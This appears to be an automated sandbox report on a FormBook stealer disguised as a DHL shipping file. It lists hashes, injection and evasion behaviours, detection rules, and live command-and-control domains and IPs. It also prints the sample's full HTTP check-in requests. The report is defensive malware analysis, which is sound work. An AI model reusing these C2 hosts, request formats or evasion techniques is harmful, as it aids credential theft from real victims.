Edit tour

Windows Analysis Report
DHL 745-12302024.exe

Overview

General Information

Sample name:	DHL 745-12302024.exe
Analysis ID:	1582687
MD5:	8cc198852f8e33a75fe06dc4044794f9
SHA1:	db40b81c82d39682afbb5b337a02779a05bd31ca
SHA256:	30de76c4187db01e3b49096449be96c83f0404b9c2361c30d0fb933fa791d6d6
Tags:	DHLexeFormbookuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

DHL 745-12302024.exe (PID: 1912 cmdline: "C:\Users\user\Desktop\DHL 745-12302024.exe" MD5: 8CC198852F8E33A75FE06DC4044794F9)

svchost.exe (PID: 3556 cmdline: "C:\Users\user\Desktop\DHL 745-12302024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

YtGWSBzTzAeRZwtsgUUux.exe (PID: 364 cmdline: "C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

netbtugc.exe (PID: 824 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)

YtGWSBzTzAeRZwtsgUUux.exe (PID: 3852 cmdline: "C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 316 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x37092:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x20731:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x492858:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x47bef7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x492858:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x47bef7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.2600000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.2600000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.2600000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.2600000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 745-12302024.exe", CommandLine: "C:\Users\user\Desktop\DHL 745-12302024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 745-12302024.exe", ParentImage: C:\Users\user\Desktop\DHL 745-12302024.exe, ParentProcessId: 1912, ParentProcessName: DHL 745-12302024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 745-12302024.exe", ProcessId: 3556, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\DHL 745-12302024.exe", CommandLine: "C:\Users\user\Desktop\DHL 745-12302024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 745-12302024.exe", ParentImage: C:\Users\user\Desktop\DHL 745-12302024.exe, ParentProcessId: 1912, ParentProcessName: DHL 745-12302024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 745-12302024.exe", ProcessId: 3556, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:28:49.799536+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49710	154.215.72.110	80	TCP
2024-12-31T09:29:21.787548+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49715	116.50.37.244	80	TCP
2024-12-31T09:30:43.689743+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49722	85.159.66.93	80	TCP
2024-12-31T09:30:56.983092+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49726	91.195.240.94	80	TCP
2024-12-31T09:31:18.477757+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49730	66.29.149.46	80	TCP
2024-12-31T09:31:31.922692+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49734	195.110.124.133	80	TCP
2024-12-31T09:32:01.603230+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.9	49738	217.196.55.202	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL 745-12302024.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.goldenjade-travel.com/fo8o/?D0=YnO0xF1X40&BR14=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ==	Avira URL Cloud: Label: malware
Source: http://www.rssnewscast.com/fo8o/?BR14=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&D0=YnO0xF1X40	Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/	Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?D0=YnO0xF1X40&BR14=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A==	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: DHL 745-12302024.exe	Virustotal: Detection: 39%			Perma Link
Source: DHL 745-12302024.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3875496509.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875554643.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3878718272.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3875131699.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591817678.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3876602708.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1592836487.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1591186605.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DHL 745-12302024.exe

Joe Sandbox ML: detected

Source: DHL 745-12302024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000000.1500025440.000000000071E000.00000002.00000001.01000000.00000004.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3875775604.000000000071E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL 745-12302024.exe, 00000000.00000003.1419858833.0000000004180000.00000004.00001000.00020000.00000000.sdmp, DHL 745-12302024.exe, 00000000.00000003.1420549447.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591979287.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591979287.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1482196880.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1480290913.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3877078312.00000000034EE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3877078312.0000000003350000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1591339858.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1594270488.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL 745-12302024.exe, 00000000.00000003.1419858833.0000000004180000.00000004.00001000.00020000.00000000.sdmp, DHL 745-12302024.exe, 00000000.00000003.1420549447.0000000003FE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1591979287.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591979287.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1482196880.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1480290913.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.3877078312.00000000034EE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3877078312.0000000003350000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1591339858.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.1594270488.00000000031A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1549965515.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591612436.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000003.1519574797.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3878368158.000000000397C000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000002C1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1891410540.000000001E83C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.3875628569.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3878368158.000000000397C000.00000004.10000000.00040000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000008.00000002.3877046525.0000000002C1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1891410540.000000001E83C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1549965515.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1591612436.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, YtGWSBzTzAeRZwtsgUUux.exe, 00000003.00000003.1519574797.0000000000B9B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00A9C2A2 FindFirstFileExW,	0_2_00A9C2A2
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD68EE FindFirstFileW,FindClose,	0_2_00AD68EE
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00AD698F
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00ACD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ACD076
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00ACD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ACD3A9
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AD9642
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AD979D
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00ACDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00ACDBBE
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00AD9B2B
Source: C:\Users\user\Desktop\DHL 745-12302024.exe	Code function: 0_2_00AD5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00AD5C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0080BAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0080BAB0

Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then xor eax, eax	4_2_007F9480
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then pop edi	4_2_007FDD45
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4x nop then mov ebx, 00000004h	4_2_0309053E

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49710 -> 154.215.72.110:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49715 -> 116.50.37.244:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49722 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49730 -> 66.29.149.46:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49734 -> 195.110.124.133:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49738 -> 217.196.55.202:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49726 -> 91.195.240.94:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.joyesi.xyz

Source: Joe Sandbox View	IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View	IP Address: 154.215.72.110 154.215.72.110

Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\DHL 745-12302024.exe

Code function: 0_2_00ADCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00ADCE44

Source: global traffic	HTTP traffic detected: GET /fo8o/?D0=YnO0xF1X40&BR14=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?D0=YnO0xF1X40&BR14=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?D0=YnO0xF1X40&BR14=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?BR14=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&D0=YnO0xF1X40 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?BR14=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&D0=YnO0xF1X40 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?D0=YnO0xF1X40&BR14=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
